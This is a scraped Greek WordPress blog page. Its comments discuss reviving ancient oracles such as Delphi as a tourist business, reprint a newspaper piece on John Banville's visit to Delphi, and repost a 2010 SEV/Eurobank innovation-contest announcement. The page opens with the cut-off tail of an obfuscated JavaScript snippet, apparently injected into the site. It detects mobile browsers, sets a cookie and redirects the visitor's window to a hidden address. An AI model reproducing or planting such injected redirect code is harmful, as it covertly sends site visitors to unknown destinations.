)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Advertisements

5 Σχόλια »

  1. Θα με ενδιέφερε η άποψη σας για το θεμα .

    Σχόλιο από thelastrealanwnymous — Μαΐου 23, 2010 @ 11 :46 πμ | Απάντηση

  2. Αν το δουμε στενα (μα πολυ στενα!) οικονομικα, καλη ιδεα ειναι να… κρατικοποιήσουμε ολα τα μεντιουμ, αστρολογους, καφετζουδες, κλπ, δλδ όλους τους μαντεις!!!
    Αν το δουμε ομως απο πολιτιστικη σκοπια, απο τη σκοπια της προόδου του Ανθρωπου, ε, μαλλον μια παρομοια ενεργεια θα μας στείλει στο καιρό των σπηλαιων…

    Σχόλιο από Rodia — Μαΐου 23, 2010 @ 6 :16 μμ | Απάντηση

  3. Του Ηλια Μαγκλινη, Η ΚΑΘΗΜΕΡΙΝΗ, Kυριακή, 23 Mαϊου 2010
    Το είχε τάμα ο Ιρλανδός Τζον Μπάνβιλ, την επόμενη φορά που θα ερχόταν στην Ελλάδα να επισκεφθεί τους Δελφούς. Το έκανε, την επομένη της διάλεξής του στο Μέγαρο Μουσικής (13 Μαΐου). Μόνο που δεν πήγε μόνος αλλά μαζί μας, και με τη μεταφράστριά του, την Τόνια Κοβαλένκο, και τον φωτογράφο μας, τον Νίκο Κοκκαλιά.
    Συμβουλές από την Πυθία
    «Γιατί τέτοιο πάθος με τους Δελφούς;» τον ρωτώ. «Επρεπε να συμβουλευθώ την Πυθία», αποκρίνεται χαμογελώντας με νόημα.
    Δεν του το είπα εκείνη τη στιγμή, ίσως όμως και να το γνωρίζει, αλλά ο συχνότερος λόγος για τον οποίο οι αρχαίες κοινότητες έρχονταν στο μαντείο των Δελφών ήταν για να τους αποκαλύψει για ποιες αμαρτίες μαστίζονται από λοιμό. Από ποιο εσωτερικό, συμβολικό λοιμό μαστίζεται αυτός ο ευγενής μα βαρύς Ιρλανδός; Ισως να έχει να κάνει με συγγραφικούς πόνους που, στην περίπτωση του Μπάνβιλ, αφορούν την αρχαία Ελλάδα: το τελευταίο του μυθιστόρημα, «Απειροι κόσμοι», είναι η ιστορία ενός ετοιμοθάνατου ο οποίος, εκτός από τους συγγενείς του, στο νεκροκρέβατό του περιστοιχίζεται από τους αόρατους αρχαίους θεούς, ενώ το βιβλίο που ετοιμάζει τιτλοφορείται, όπως μας είπε, «Περσεφόνη». «Σε δύο χρόνια θα το έχω τελειώσει».
    Αλλά δεν είναι ακριβώς η βάσανος της γραφής που έφερε τον Τζον Μπάνβιλ στους Δελφούς. Είναι κάτι ευρύτερο, πιο καθημερινό και γι’ αυτό πιο βαθύ. Το αποκαλύπτει μόνος του λίγο μετά, όταν τον καταλαμβάνει μια διάθεση εξομολογητική. «Ενα τέτοιο τόπο όπως οι Δελφοί, δεν είναι δυνατόν να μην θέλει κάποιος να τον επισκεφθεί. Ενα μέρος στο οποίο το παρελθόν εισβάλλει από παντού. Ολο αυτό το μυστηριακό φορτίο που κρύβει».
    Παράξενο. Λίγα λεπτά πριν, το αυτί μου είχε αρπάξει μια κουβέντα ανάμεσα στην Τόνια και τον Μπάνβιλ. Ακουσα μόνο την απάντησή του. «Οχι, δεν πιστεύω στον Θεό ούτε στη μετά θάνατο ζωή. Πιστεύω ότι είμαστε μόνον εμείς, εμείς και αυτές οι πέτρες». Οσο κι αν συμφωνούσα μαζί του, διέκρινα κάτι απόλυτο στον λόγο του, έναν δογματισμό που πήρε ο ίδιος να κλαδεύει όταν ξαποστάσαμε στη σκιά, όταν έγινε εξομολογητικός και άμεσος.
    Λες και κάποιος αόρατος σκηνοθέτης γύριζε ταινία: οι ομάδες των τουριστών και των λαλίστατων ξεναγών εξαφανίζονται για λίγα λεπτά και το λουσμένο στο φως τοπίο ολόγυρα αποκτά κάτι απρόσμενα μυστηριακό. «Αυτό που αισθάνομαι εδώ, τώρα», λέει ο Ιρλανδός συγγραφέας, «το έχω ξανανιώσει ελάχιστες φορές στη ζωή μου. Μία ήταν στον αρχαίο ναό της Εγέστας, στη βορειοδυτική Σικελία. Ηταν απόγευμα και ταξιδεύαμε με τη γυναίκα μου, με το αυτοκίνητο. Σταματήσαμε και βγήκαμε έξω για λίγο. Ηταν κάτι το τρομακτικό. Αυτή η αίσθηση του εξωπραγματικού. Οπως και σ’ ένα παμπάλαιο πηγάδι στο αγρόκτημα φίλων στην Ιρλανδία, από την εποχή των Δρυίδων» (το «ιερό πηγάδι» που κάνει την εμφάνισή του και στο μυθιστόρημα «Απειροι κόσμοι»).
    «Οταν έχασα τη μητέρα μου», συνεχίζει ο Μπάνβιλ, «λίγη ώρα μετά στεκόμουν μπροστά στον καθρέφτη του μπάνιου της όταν ένιωσα για μια στιγμή κάτι να περνάει από πίσω μου. Θα ορκιζόμουν ότι ήταν εκείνη. Δε λέω ότι ήταν, απλώς τι αισθάνθηκα». «Φοβήθηκες;» ρωτάει η Τόνια. «Ηταν ανατριχιαστικό. Το αστείο είναι ότι έχουν περάσει τόσα χρόνια από τον θάνατο της μητέρας μου, δεν την έχω κλάψει ούτε μια φορά. Οταν όμως ένα βράδυ με φιλοξένησε ένα φιλικό ζευγάρι στο σπίτι του, ονειρεύτηκα ότι έκλαιγα με λυγμούς κι εκείνη ήταν εκεί, μαζί μου. Διηγήθηκα το όνειρο στην οικοδέσποινα και το βρήκε πολύ φυσικό: είχα κοιμηθεί στο ντιβάνι όπου ξαπλώνουν οι ασθενείς του συζύγου της, ο οποίος είναι ψυχοθεραπευτής και μάλιστα γιουνγκιανός!»
    Γέλια. Και μετά σιωπή πάλι. Καθώς προχωράμε, ρωτάω τον Μπάνβιλ αν έχει υπόψη του μια κλασική σήμερα μελέτη, το «Οι Ελληνες και το παράλογο» του Ιρλανδού φιλολόγου E. R. Dodds. «Φυσικά!», απαντά αμέσως. «Ενα από τα πιο συναρπαστικά βιβλία που έχω διαβάσει». Αντιγράφω από το βιβλίο του Dodds: «Οι Ελληνες πίστευαν στο Μαντείο τους, όχι διότι ήσαν δεισιδαίμονες και μωροί, αλλά επειδή τους χρειαζόταν αυτή η πίστη».
    Περί πίστης λοιπόν ο λόγος. «Δεν ξέρω», λέει σκεφτικός. «Ισως όλ’ αυτά είναι πράγματα που τα νιώθεις διότι θέλεις απλώς να τα νιώσεις. Γι’ αυτό ήθελα να έρθω στους Δελφούς. Είναι αυτή η αρχέγονη σχέση του ανθρώπου με το ιερό, ανεξάρτητα από το αν πιστεύεις ή όχι. Η ανάγκη να νιώσεις το δέος».
    Ανθρωπος ορθογώνιος κατά τα άλλα, πειθαρχημένος στη δουλειά του, δεινός αναγνώστης επιστημονικών κειμένων (εξ ου και η περίφημη μυθιστορηματική τριλογία του για τον Κοπέρνικο, τον Κέπλερ και τον Νεύτωνα), ο Ιρλανδός συγγραφέας αφήνει τελικά ένα παράθυρο ανοιχτό σε όλα τα ανεξήγητα. «Ακόμα και οι φυσικοί λένε ότι αυτό που αντιλαμβανόμαστε είναι μια πολύ λεπτή γραμμή, πολύ περιορισμένη, ειδικά η αίσθηση που έχουμε από τον χρόνο. Ο χρόνος είναι κάτι πολύ μυστήριο. Η μνήμη επίσης. Πότε ξέρουμε αν μια στιγμή έχει πάψει να είναι παρόν κι έχει γίνει παρελθόν; Μια θεωρία λέει ότι το γεγονός που θυμάσαι δεν είναι ποτέ αυτό που ήταν ακριβώς αλλά ένα μοντέλο που έχεις φτιάξει στο κεφάλι σου. Κάτι ιδεατό, κάτι που διαμορφώνεις εσύ ο ίδιος».

    Σχόλιο από thelastrealanwnymous — Μαΐου 24, 2010 @ 3 :14 πμ | Απάντηση

  4. Φαντάζομαι πως μάλλον δείχνουν ακραίες οι απόψεις μου και επειδή είμαστε επηρεασμένοι από τα γεγονότα των ημερών και επειδή η τιβι συνεχίζει να πρωταγωνιστεί στην εικονική απόδοση δικαιοσύνης, θα κάνω μια «διευκρινιστική» περίληψη, όπως στα συνέδρια.
    Δεν εντυπωσιάζουν τον πολύ κόσμο οι αρχαιότητες , ειδικά όταν είναι πεταμένες εδώ και κει με την μορφή ερειπίων . Δεν «βλέπουν» αυτά που φαντάζονται για την αρχαία Ελλάδα και απογοητεύονται. Ο παράγοντας που θα μπορούσε να ζωντανέψει ερείπια, να συνδέσει την «κομμένη» ιστορία με το σήμερα, να δημιουργήσει πραγματικό εμπορικό ενδιαφέρον για τα αρχαία κειμήλια, είναι η «επαναλειτουργία» των μαντείων.
    Φυσικά πρόκειται για σύγχρονη αντιμετώπιση των προβλέψεων που θα την αναλάβουν μεγάλες εταιρείες. Η αγορά έχει ανάγκη για προβλέψεις που μέχρι τωρα τις προσφέρουν σποραδικά οι αδαείς. Όσο αφορά το γραφικό κομάτι των μαντείων αρκεί μια θεματική ντισνεϋλαντ , μια παιχνιδούπολη με μαντεις , χρησμούς , φυλαχτά , αναπαραστάσεις τελετών , Πυθίες …
    …και αυτό δεν θα γίνει μόνο στους Δελφούς αλλά σε όλη την επικράτεια που υπήρχαν μαντεία.
    Τουρίστες υπάρχουν όλες τις εποχές τπυ χρόνου. Περιμένουν μόνο από μας το έναυσμα για να φθάσουν στη χώρα μας.

    Σχόλιο από thelastrealanwnymous — Μαΐου 29, 2010 @ 10 :09 πμ | Απάντηση

  5. Με σύνθημα «Η Ελλάδα καινοτομεί», ο ΣΕΒ και η Eurobank EFG αναλαμβάνουν κοινή πρωτοβουλία με στόχο την προώθηση της έρευνας και καινοτομίας στη χώρα μας. Στο πλαίσιο αυτό, διοργανώνουν πανελλήνιο διαγωνισμό Εφαρμοσμένης Έρευνας και Καινοτομίας που απευθύνεται στους ανθρώπους της έρευνας, της καινοτομίας, της γνώσης και των νέων ιδεών.

    Στόχος της πρωτοβουλίας αυτής είναι να κινητοποιηθούν δημιουργικές δυνάμεις της ελληνικής κοινωνίας και να ενθαρρυνθεί η έρευνα και η καινοτομία, που αποτελούν αναγκαίες προϋποθέσεις για την αναβάθμιση της παραγωγικής βάσης και της ανταγωνιστικότητας της οικονομίας μας.

    Ο διαγωνισμός σκοπεύει να αναδείξει προϊόντα εφαρμοσμένης έρευνας και προϊόντα ή υπηρεσίες καινοτομίας, που συμβάλλουν στη βελτίωση της καθημερινής ζωής, στη βιώσιμη ανάπτυξη και στην ενίσχυση της εξωστρέφειας της οικονομίας.

    Πέραν της σημειολογικής αξίας της επιβράβευσης μέσω του διαγωνισμού δίνεται η δυνατότητα σε όσους θα συμμετάσχουν να έλθουν σε επαφή με την επιχειρηματική κοινότητα και να έχουν την υποστήριξη του ΣΕΒ και της Eurobank προκειμένου η ιδέα να γίνει πράξη.

    Για τους λόγους που οδήγησαν τους δύο φορείς στην πρωτοβουλία αυτή, ο Πρόεδρος του ΣΕΒ κ. Δημήτρης Δασκαλόπουλος, δήλωσε: «Η σύγχρονη επιχείρηση δεν έχει την πολυτέλεια της αδράνειας και της στασιμότητας. Στις επιχειρήσεις όποιος δεν ανανεώνεται, παρακμάζει. Όποιος δεν ανταποκρίνεται στην ανάγκη της αλλαγής είναι καταδικασμένος. Το ίδιο ισχύει και για τις κοινωνίες.
    Είναι γνωστό ότι στην Ελλάδα η καινοτομία, όπως και η ανάπτυξη γνώσης, υστερεί. Όμως, στο υπέδαφος της κοινωνίας μας υπάρχουν κοιτάσματα χρυσού. Πολλοί νέοι, πολλοί επιχειρηματίες, πολλοί επαγγελματίες αποτινάσσουν τα δεσμά της αδιαφορίας και της αβελτηρίας, αντιστέκονται στις σειρήνες των εύκολων επιλογών και διαπρέπουν με σκληρή δουλειά, φαντασία και συνέπεια. Νιώθουν πόσο αναγκαίο είναι να ξαναγίνουμε μία κοινωνία δράσης και δυναμικής προσαρμογής, ικανή να αναμετρηθεί με το μέλλον. Μερικά απ’ αυτά τα κοιτάσματα χρυσού επιδιώκει να φέρει στην επιφάνεια ο διαγωνισμός εφαρμοσμένης έρευνας και καινοτομίας που ξεκινάμε σήμερα».

    Αναφερόμενος στο διαγωνισμό,ο Διευθύνων Σύμβουλος του ομίλου Eurobank EFG κ. Νικόλαος Νανόπουλος δήλωσε: «Η πρωτοβουλία μας υπαγορεύεται από την ισχυρή μας πεποίθηση πως η καινοτομία, οι νέες ιδέες, η επένδυση στη γνώση και την έρευνα, πρέπει να αξιοποιούνται και να βρίσκουν έδαφος εφαρμογής στην παραγωγική και επιχειρηματική δραστηριότητα. Έτσι μόνον, ενισχύονται και αναβαθμίζονται συνεχώς η παραγωγικότητα, η ποιότητα, η προστιθέμενη αξία και η ανταγωνιστικότητα των προϊόντων και των υπηρεσιών που παράγουμε με γνώμονα τις ανάγκες και τις απαιτήσεις ενός διεθνούς περιβάλλοντος που εξελίσσεται ραγδαία και γίνεται όλο και πιο ανταγωνιστικό.
    Εμείς στην Eurobank υποστηρίζουμε εδώ και καιρό την ανάγκη να θεμελιώσουμε ένα νέο πρότυπο διατηρήσιμης ανάπτυξης, το οποίο θα ενισχύει την παραγωγικότητα, την ανταγωνιστικότητα, την εξωστρέφεια και την απασχόληση. Για να το πετύχουμε αυτό πρέπει να θεμελιώσουμε την προσπάθειά μας πάνω στην καινοτομία, την έρευνα, την Παιδεία, τη γνώση, τις νέες ιδέες και τη δημιουργικότητα. Αυτά θα προικίσουν την ελληνική οικονομία με τα νέα συγκριτικά πλεονεκτήματα που έχει ανάγκη ώστε να ανακτήσει το χαμένο έδαφος στη δύσκολη και αέναη μάχη της διεθνούς ανταγωνιστικότητας».

    Στη δυναμική των επενδύσεων στην Έρευνα και τη Καινοτομία και τη σημαντική συμβολή τους στην ενίσχυση της εξωστρέφειας και το ρυθμό ανάπτυξης της οικονομίας αναφέρθηκε ο Αναπληρωτής Διευθύνων Σύμβουλος του ομίλου Eurobank EFG κ. Νικόλαος Καραμούζης, υπογραμμίζοντας: «H εμπειρία άλλων χωρών έχει δείξει ότι μπορεί μία χώρα να πετύχει μεγάλη αύξηση των εξαγωγών, της οικονομικής εξωστρέφειας και αύξηση του ρυθμού ανάπτυξης χωρίς να απαιτείται η μείωση του κόστους εργασίας σαν κυρίαρχο ανταγωνιστικό πλεονέκτημα. Η Ελλάδα σήμερα επενδύει μόνον ποσοστό 0,6% του ΑΕΠ για έρευνα και ανάπτυξη τεχνολογίας έναντι 3,7% της Σουηδίας και 3,6% της Φινλανδίας και βρίσκεται δυστυχώς κάτω από χώρες όπως Ρουμανία και Λιθουανία, Εσθονία, Λάτβια. Μελέτες έχουν δείξει ότι μια αύξηση των επενδύσεων σε Έρευνα & Καινοτομία κατά 1 ποσοστιαία μονάδα του ΑΕΠ οδηγεί μακροπρόθεσμα σε αύξηση της παραγωγικότητας της εθνικής οικονομίας κατά περίπου 0,3% σε ετήσια βάση. Η Eurobank, πιστή στη δέσμευσή της για πραγματική στήριξη της επιχειρηματικότητας, δεσμεύεται να εξετάσει – πάντα λαμβάνοντας υπόψη τα τραπεζικά κριτήρια – να χρηματοδοτήσει την επιχείρηση που θα αναλάβει να υιοθετήσει μια από τις καινοτόμες ιδέες που θα αναδειχθούν μέσα από το διαγωνισμό, με το κόστος που θα απαιτηθεί ώστε να την υλοποιήσει παραγωγικά. Είμαστε βέβαιοι ότι ο διαγωνισμός θα συνδράμει ουσιαστικά στη βελτίωση της επιχειρηματικότητας και στην ενίσχυση της ανταγωνιστικότητας της εθνικής μας οικονομίας, βάζοντας έτσι τις βάσεις για ένα σίγουρο αναπτυξιακό μέλλον».

    Ο διαγωνισμός περιλαμβάνει δύο κατηγορίες βραβείων:

    Μία για την Εφαρμοσμένη Έρευνα & μια για τη Καινοτομία. Σε κάθε κατηγορία θα απονεμηθούν από δύο βραβεία, πρώτο (Α) και δεύτερο (Β) δηλαδή συνολικά τέσσερα βραβεία. Τα βραβεία του διαγωνισμού ανά πεδίο είναι χρηματικά και συνοδεύονται από τιμητική πλακέτα
    Στο διαγωνισμό μπορούν να συμμετάσχουν μεμονωμένοι ερευνητές, ερευνητικές ομάδες, επιχειρήσεις που δραστηριοποιούνται παραγωγικά ή/και ερευνητικά στην Ελλάδα καθώς και ιδρύματα της ημεδαπής που δραστηριοποιούνται στο χώρο της έρευνας. Η προθεσμία υποβολής των υποψηφιοτήτων είναι έως τις 30 Σεπτεμβρίου 2010.

    Τη διαδικασία αξιολόγησης (γραπτής και προφορικής) θα συντονίσει και θα εποπτεύσει Επιστημονικό Συμβούλιο, αποτελούμενο από διακεκριμένους επιστήμονες.

    Με βάση την τελική βαθμολογία κατά το στάδιο της γραπτής αξιολόγησης, θα επιλεγούν οι έως 20 καλύτερες υποψηφιότητες (10 για την κατηγορία Εφαρμοσμένη έρευνα – 10 για την κατηγορία Καινοτομία). Για τις έως 20 υποψηφιότητες που θα προκριθούν κατά το στάδιο αυτό και προ της τελικής κατάταξης που θα προκύψει μετά την ολοκλήρωση και του σταδίου της προφορικής αξιολόγησης, θα οργανωθεί ειδική προβολή των προτάσεων των υποψηφιοτήτων που, μεταξύ άλλων, θα περιλαμβάνει: περιφερειακές εκδηλώσεις σε 5 πόλεις της Ελλάδας (Θεσσαλονίκη, Πάτρα, Λάρισα, Ηράκλειο, Ιωάννινα), καθώς και την έκδοση ειδικού λευκώματος που θα διανεμηθεί σε ευρύ κύκλο αποδεκτών κυρίως επιχειρηματιών.

    Η προκήρυξη του διαγωνισμού, στην οποία περιέχονται αναλυτικά οι όροι και οι προϋποθέσεις συμμετοχής σε αυτόν, είναι αναρτημένοι στον ειδικά διαμορφωμένο διαδικτυακό τόπο http://www.kainotomeis.gr, τον οποίο μπορούν να επισκέπτονται οι ενδιαφερόμενοι για περαιτέρω πληροφορίες καθώς και για την ηλεκτρονική υποβολή των προτάσεών τους

    Σχόλιο από thelastrealanwnymous — Ιουνίου 6, 2010 @ 9 :53 πμ | Απάντηση


RSS feed for comments on this post. TrackBack URI

Σχολιάστε

Εισάγετε τα παρακάτω στοιχεία ή επιλέξτε ένα εικονίδιο για να συνδεθείτε:

Λογότυπο WordPress.com

Σχολιάζετε χρησιμοποιώντας τον λογαριασμό WordPress.com. Αποσύνδεση / Αλλαγή )

Φωτογραφία Twitter

Σχολιάζετε χρησιμοποιώντας τον λογαριασμό Twitter. Αποσύνδεση / Αλλαγή )

Φωτογραφία Facebook

Σχολιάζετε χρησιμοποιώντας τον λογαριασμό Facebook. Αποσύνδεση / Αλλαγή )

Φωτογραφία Google+

Σχολιάζετε χρησιμοποιώντας τον λογαριασμό Google+. Αποσύνδεση / Αλλαγή )

Σύνδεση με %s

Δημιουργήστε ένα δωρεάν ιστότοπο ή ιστολόγιο στο WordPress.com.

Αρέσει σε %d bloggers: